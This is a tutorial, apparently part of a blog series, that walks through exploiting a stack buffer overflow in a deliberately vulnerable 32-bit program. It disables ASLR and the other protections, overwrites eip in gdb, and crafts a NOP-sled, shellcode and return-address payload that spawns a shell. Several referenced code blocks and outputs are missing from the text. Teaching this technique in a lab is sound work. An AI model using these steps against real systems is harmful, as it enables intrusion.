By this third article of the Buffer Overflow series we should be familiar with:
- memory segmentation,
- buffer overflow,
- assembly and disassembly
In this article we will detail how to exploit a buffer overflow in order to achieve remote code execution via shellcode injection.
As stated in the introduction, the memory layout of a running application has become significantly more complex with the implementation of various security measures, which make exploiting vulnerabilities such as buffer overflows much more challenging. Common and highly effective security measures include:
- ASLR protection (Address Space Layout Randomization) randomly arranges the address space positions of key data areas of a program. At each new execution, the stored data is placed in different memory spaces.
- SSP protection (Stack-Smashing Protector) detects stack buffer overruns by aborting if a secret value on the stack is changed. These secret values (“canaries”) are inserted between the local buffers and the saved control data on the stack. Their integrity is checked before the function returns, and the program is aborted immediately if a modification is detected.
- Non-executable stack and heap (NX): these memory regions are intended to contain only data such as variables and pointers, never executable code, so instructions stored there cannot be executed.
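To make the canary idea more concrete, here is a minimal Python sketch of a toy stack frame. It is only a model under stated assumptions: the 16-byte buffer, the 4-byte canary and the function names (`make_frame`, `unchecked_copy`, `canary_intact`) are hypothetical and chosen for illustration, and real SSP is implemented by the compiler, not like this.

```python
import secrets

BUF_SIZE = 16      # toy buffer size (assumption, much smaller than a real buffer)
CANARY_SIZE = 4    # toy canary size (assumption)


def make_frame(canary: bytes) -> bytearray:
    """Lay out [ buffer ][ canary ][ saved return address ] from low to high addresses."""
    if len(canary) != CANARY_SIZE:
        raise ValueError("canary must be exactly CANARY_SIZE bytes")
    return bytearray(BUF_SIZE) + bytearray(canary) + bytearray(b"RET!")


def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Copy data to the start of the frame without checking the buffer size."""
    if len(data) > len(frame):
        raise ValueError("data larger than the modelled frame")
    frame[:len(data)] = data


def canary_intact(frame: bytearray, canary: bytes) -> bool:
    """Return True if the canary stored after the buffer is unchanged."""
    return bytes(frame[BUF_SIZE:BUF_SIZE + CANARY_SIZE]) == canary


if __name__ == "__main__":
    canary = secrets.token_bytes(CANARY_SIZE)  # random secret chosen at startup
    frame = make_frame(canary)
    unchecked_copy(frame, b"A" * (BUF_SIZE + 8))  # overflow past the buffer
    print("canary intact:", canary_intact(frame, canary))
```

The point of the model is that any write running past the buffer has to cross the canary before it reaches the saved return address, so the corruption can be noticed before the function returns.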
For the learning purpose of our example, we are going to disable these protections and force a 32-bit compilation.
[hg8@archbook ~]$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # disable ASLR
- -m32: Compile for 32-bit.
- -g: Generate debug information to be used by the GDB debugger.
- -mpreferred-stack-boundary=2: Keep the stack aligned on 4-byte boundaries, preventing alignment padding on the stack that could make our example confusing.
- -fno-stack-protector: Disable the Stack-Smashing Protector.
- -z execstack: Disable NX (allowing the stack segment to be executable).
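Before going further, the ASLR setting can be double-checked by reading the same kernel file back. The following is a minimal sketch assuming a Linux system; the helper name `describe_aslr` and the wording of the mode labels are my own.

```python
from pathlib import Path

# Kernel setting written to when disabling ASLR
ASLR_SYSCTL = Path("/proc/sys/kernel/randomize_va_space")

# Meaning of the documented values of randomize_va_space
ASLR_MODES = {
    0: "disabled",
    1: "partial randomization",   # stack, mmap base and VDSO
    2: "full randomization",      # same as 1, plus the heap (brk)
}


def describe_aslr(raw_value: str) -> str:
    """Translate the content of randomize_va_space into a readable label."""
    return ASLR_MODES.get(int(raw_value.strip()), "unknown")


if __name__ == "__main__":
    if ASLR_SYSCTL.exists():
        print("ASLR:", describe_aslr(ASLR_SYSCTL.read_text()))
    else:
        print("randomize_va_space not found (not a Linux system?)")
```

For the rest of the example to behave as described, the reported state should be "disabled".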
Let’s now open our program with gdb:
[hg8@archbook ~]$ gdb ./vuln
In the previous article, the disassembly of our example program allowed us to understand what our program stack will look like:
In order to exploit the buffer overflow in our program, we are going to pass an input longer than 500 characters to our buffer.
It’s important to note that, even though the stack itself grows downward, from higher to lower memory addresses, the buffer itself is filled from lower to higher memory addresses.
In our example, when we input a string longer than 500 characters, it will begin overwriting the saved register value that sits right after the buffer on the stack (at a higher memory address).
For example, if we use a 501-character input, the following will happen:
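A small Python model of this layout can help picture the overflow. This is only a sketch under assumptions: the saved register values passed to `make_frame` are made-up placeholders, the 16 bytes of slack after the saved eip stand in for the caller’s frame, and `strcpy_like` merely imitates the fact that `strcpy` copies the string plus its terminating NUL byte without any bounds check.

```python
import struct

BUF_SIZE = 500   # size of the buffer in the example program
SLACK = 16       # assumption: a few bytes of the caller's frame after saved eip


def make_frame(ebx: int, ebp: int, eip: int) -> bytearray:
    """Model [ buffer ][ saved ebx ][ saved ebp ][ saved eip ], low to high addresses."""
    saved = struct.pack("<III", ebx, ebp, eip)  # 32-bit little-endian values
    return bytearray(BUF_SIZE) + bytearray(saved) + bytearray(SLACK)


def strcpy_like(frame: bytearray, text: bytes) -> None:
    """Copy text and its terminating NUL byte with no bounds check, like strcpy."""
    data = text + b"\x00"
    if len(data) > len(frame):
        raise ValueError("input larger than the modelled frame")
    frame[:len(data)] = data


def saved_registers(frame: bytearray) -> tuple:
    """Return the saved (ebx, ebp, eip) values as integers."""
    return struct.unpack_from("<III", frame, BUF_SIZE)


if __name__ == "__main__":
    # Placeholder register values, chosen only for illustration
    frame = make_frame(ebx=0xF7FA6000, ebp=0xFFFFD0A8, eip=0x08049200)
    strcpy_like(frame, b"A" * 501)
    print([hex(value) for value in saved_registers(frame)])
```

In this model, the 501st ‘A’ lands on the lowest byte of the saved ebx value, and the terminating NUL byte overwrites the byte right after it, while the saved ebp and eip stay untouched.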
Let’s now see in practice what happens when we pass a 501-character string to our program.
We can use Python to generate a string made of 501 occurrences of the letter ‘A’ (0x41 is hexadecimal for 65, which is the ASCII code for the letter ‘A’).
In gdb this can be done using the run command:
[hg8@archbook ~]$ gdb ./vuln
Nothing happens, which is expected since EBX is not a critical register in our example program.
Let’s now add a breakpoint in order to highlight how the EBX register got overwritten with an extra 0x41:
(gdb) disassemble main
Now, by checking the registers with the info registers command, we can verify that the ebx register is being overwritten:
By passing a 504-character string, we overwrite the whole ebx register:
(gdb) run $(python -c "print('\x41'*504)")
We can also visualize what the stack looks like in memory from gdb with x/14x $sp+460. Let’s decompose the command to understand how it works:
- x/14x displays 14 units of memory in hexadecimal format (by default gdb uses 4-byte words).
- $sp+460 starts the memory reading from the stack pointer ($sp) position offset by +460, which is around where our saved ebx value is located.
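To get a feel for how such a dump maps to the raw bytes, the sketch below renders a byte string as rows of 32-bit little-endian words, loosely imitating the layout of gdb’s output. The function name `dump_words` and the base address used in the example are hypothetical, and the formatting is only an approximation of what gdb prints.

```python
import struct


def dump_words(memory: bytes, base_address: int, count: int) -> str:
    """Render `count` 32-bit little-endian words, four per row, with their address."""
    words = struct.unpack_from(f"<{count}I", memory, 0)
    lines = []
    for index in range(0, count, 4):
        row = words[index:index + 4]
        address = base_address + 4 * index
        lines.append(f"0x{address:08x}:\t" + "\t".join(f"0x{w:08x}" for w in row))
    return "\n".join(lines)


if __name__ == "__main__":
    # End of a buffer filled with 'A', followed by four overflowed 'B' bytes
    memory = b"A" * 12 + b"B" * 4
    print(dump_words(memory, 0xFFFFD000, 4))  # hypothetical base address
```

Four ‘B’ characters in memory therefore show up as a single word, 0x42424242, which is the pattern to look for in the stack dump.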
Beforehand, let’s slightly tweak our payload to make it more visible on the stack representation: instead of ‘A’, we will fill the 4 overflowed bytes with ‘B’ (0x42):
(gdb) run $(python -c "print('\x41'*500+'\x42'*4)")
Now let’s overwrite every register following our buffer: ebx with ‘BBBB’, ebp with ‘CCCC’ and eip with ‘DDDD’:
(gdb) run $(python -c "print('\x41'*500+'\x42'*4+'\x43'*4+'\x44'*4)")
Our stack now looks like this:
We achieved full control of the saved register values adjacent to our buffer. So what can we do with such access? Let’s move on to exploitation.
The last register we managed to overwrite is eip.
The EIP register is the “Extended Instruction Pointer”. It holds the address of the next instruction to execute, and therefore controls the flow of the program.
This means that if we can input malicious code into the program, we can use the buffer overflow to overwrite the eip register to point to the memory address of the malicious code.
And that’s exactly what we are going to do now, and we will start by crafting a shellcode.
First of all, what is a shellcode?
A shellcode is a small piece of code used as payload when exploiting an overflow vulnerability. Historically it’s called “shellcode” because it typically starts a command shell from which the attacker can control the compromised machine.
In our case, we will inject a shellcode into our buffer so that it gets executed later on.
Wikipedia defines the writing of shellcode “as much of an art as it is a science”, since shellcode depends on the operating system, CPU architecture and is commonly written in Assembly.
You can easily find plenty of ready-made shellcodes on the internet. For our example we are going to use a very common and simple shellcode for x86 which executes a shell.
Here is a quick overview of this shellcode:
xor eax, eax ; put 0 into eax
This code can be assembled using nasm to produce an Executable and Linkable Format (ELF) object file:
[hg8@archbook ~]$ nasm -f elf shellcode.asm
Now we need to disassemble it in order to get the shellcode bytes:
[hg8@archbook ~]$ objdump -d -M intel shellcode.o
We can now easily extract the hexadecimal shellcode, either by hand or with some bash-fu:
[hg8@archbook ~]$ objdump -d ./shellcode.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
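If the shell pipeline feels hard to read, the same extraction can be sketched in Python. This is a hedged alternative, not the method used above: the function names are my own, the regular expression assumes the usual `objdump -d` line layout (offset, colon, tab, hex bytes), and the sample text only contains two illustrative instructions rather than the full shellcode.

```python
import re

# An instruction line looks like: "   0:<TAB>31 c0    <TAB>xor    eax,eax"
INSTRUCTION_LINE = re.compile(r"^\s*[0-9a-f]+:\t((?:[0-9a-f]{2} ?)+)")


def extract_opcodes(objdump_text: str) -> bytes:
    """Collect the opcode bytes of every instruction line of an objdump listing."""
    opcodes = bytearray()
    for line in objdump_text.splitlines():
        match = INSTRUCTION_LINE.match(line)
        if match:
            opcodes += bytes(int(byte, 16) for byte in match.group(1).split())
    return bytes(opcodes)


def to_escaped_string(opcodes: bytes) -> str:
    """Format bytes as a \\xNN escaped string, ready to paste into C or Python."""
    return "".join(f"\\x{byte:02x}" for byte in opcodes)


if __name__ == "__main__":
    # Illustrative sample only: two instructions, not the complete shellcode
    sample = (
        "shellcode.o:     file format elf32-i386\n\n"
        "Disassembly of section .text:\n\n"
        "00000000 <_start>:\n"
        "   0:\t31 c0                \txor    eax,eax\n"
        "   2:\t50                   \tpush   eax\n"
    )
    print(to_escaped_string(extract_opcodes(sample)))
```

In practice the text would come from the output of `objdump -d -M intel shellcode.o`, for example captured with `subprocess.run`.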
Now to be sure our shellcode works, let’s write a simple program to run it on our machine:
Let’s compile and run it:
[hg8@archbook ~]$ gcc -m32 -z execstack shellcode-loader.c -o shellcode-loader
All is good, let’s now inject the shellcode into our vulnerable program.
We now need to make our vulnerable program execute our shellcode. To do so we will inject the shellcode in the input data payload, for it to be stored in our buffer.
The next step will be to have our return address point to the memory location where our shellcode is stored in order for it to be executed.
Since memory addresses may shift slightly from one execution to another and we don’t know the exact location of our shellcode, we will use the NOP-sled technique.
A NOP sled, also known as a NOP slide, is a technique used to help ensure that a shellcode is executed even if the exact memory location of the exploit payload is not known.
The NOP, or No-Operation, instruction is a machine language instruction that performs no operation and takes up one machine cycle. A NOP sled takes advantage of this instruction by creating a sequence of NOP instructions that can serve as a landing pad for the program execution flow.
We will craft a sequence of NOP instructions followed by our shellcode. The idea is that if the execution flow is redirected to any point within the NOP sled, the CPU will execute the NOP instructions and keep moving forward until it hits the shellcode.
When utilizing a NOP-sled, the precise location of the shellcode within the buffer doesn’t matter for the return address to reach it. What we do know is that it will reside somewhere within the buffer, and its length will be 25 bytes.
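The sliding behaviour can be pictured with a toy model. The sketch below is not a CPU emulator: it only walks over 0x90 bytes and reports where the first non-NOP byte is reached. The function name `slide` and the 0xCC placeholder bytes standing in for the shellcode are assumptions made for illustration.

```python
NOP = 0x90  # opcode of the x86 NOP instruction


def slide(memory: bytes, landing_offset: int) -> int:
    """Follow NOP bytes from landing_offset; return the offset of the first non-NOP byte."""
    offset = landing_offset
    while offset < len(memory) and memory[offset] == NOP:
        offset += 1
    return offset


if __name__ == "__main__":
    # 447 NOP bytes followed by 25 placeholder bytes standing in for the shellcode
    memory = bytes([NOP]) * 447 + b"\xcc" * 25
    for landing in (0, 123, 446):
        print(f"landing at {landing} -> execution reaches offset {slide(memory, landing)}")
```

Whatever the landing point inside the sled, the walk always ends at the same offset, the first byte of the shellcode, which is why an approximate return address is enough.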
With our shellcode of 25 bytes and a payload of 512 bytes, we have 487 bytes left to fill with the NOP sled and the return address, which we will divide like so:
[ NOP SLED] [ SHELLCODE ] [ RETURN ADDRESS ]
We will use a Python script to craft our exploit. Since we use Python 3, it’s important to write the payload as raw bytes (for example with sys.stdout.buffer.write) rather than with print, which would encode non-ASCII bytes as UTF-8.
In addition, since we are working on x86, the hexadecimal value for the NOP instruction is 0x90.
Since we don’t know for now what the return address (eip) will be, we temporarily replace it with a 4-byte placeholder made of ‘C’ (\x43) that we repeat 10 times to have a bit of padding between our shellcode and the return address.
The NOP is repeated 447 times since we need to write 512 bytes to overwrite the return address:
512 - (4 * 10) - 25 = 447
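The arithmetic above can be checked with a short sketch that assembles the three parts of the payload. It is an illustration under assumptions, not the original exploit script: `build_payload` is a hypothetical helper, and the shellcode is replaced by 25 placeholder bytes (0xCC, the x86 breakpoint instruction) so that only the layout is demonstrated.

```python
NOP = b"\x90"        # x86 NOP instruction
PAYLOAD_SIZE = 512   # bytes needed to reach and overwrite the return address
RET_REPEATS = 10     # the 4-byte return address is repeated 10 times


def build_payload(shellcode: bytes, return_address: bytes) -> bytes:
    """Assemble [ NOP sled ][ shellcode ][ return address x 10 ] into 512 bytes."""
    if len(return_address) != 4:
        raise ValueError("a 32-bit return address must be exactly 4 bytes")
    tail = return_address * RET_REPEATS
    sled_length = PAYLOAD_SIZE - len(shellcode) - len(tail)
    if sled_length < 0:
        raise ValueError("shellcode too large for the payload")
    return NOP * sled_length + shellcode + tail


if __name__ == "__main__":
    placeholder_shellcode = b"\xcc" * 25   # stand-in, NOT a working shellcode
    payload = build_payload(placeholder_shellcode, b"\x43" * 4)
    print("sled length:", payload.count(NOP))
    print("total length:", len(payload))
```

To feed such a payload to a program from Python 3, the bytes would be emitted with `sys.stdout.buffer.write(payload)` so that values such as 0x90 are not altered by text encoding.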
Here is what we expect our memory to look like after execution of our payload:
Let’s run our payload:
[hg8@archbook ~]$ gdb ./vuln
We get exactly what we were looking for: a segmentation fault, since we haven’t provided a valid return address yet. Let’s now inspect the memory to determine what the return address should be.
When inspecting the memory, we can see our payload was injected as expected:
Let’s now pick any memory address within the \x90 NOP sled area before the shellcode to be our return address. From the memory dump above we can pick 0xffffce30, for example.
Since Intel CPUs are little endian, we need to reverse the byte order of the address in our payload.
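Rather than reversing the bytes by hand, the conversion can be left to Python’s struct module. A minimal sketch, where `pack_address` is a hypothetical helper name:

```python
import struct


def pack_address(address: int) -> bytes:
    """Encode a 32-bit address as 4 bytes in little-endian order."""
    return struct.pack("<I", address)


if __name__ == "__main__":
    print(pack_address(0xFFFFCE30).hex())  # prints 30ceffff
```

The least significant byte (0x30) comes first, so the address 0xffffce30 is written as \x30\xce\xff\xff in the payload.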
Our script becomes:
If everything goes fine, strcpy will copy our string into the buffer, and when the function tries to return it will load our injected return address, redirecting execution to the NOP sled and then to the shellcode, which will be executed.
Let’s give it a try:
[hg8@archbook ~]$ gdb ./vuln
And here we go! The buffer overflow was successfully exploited, giving us access to a command shell.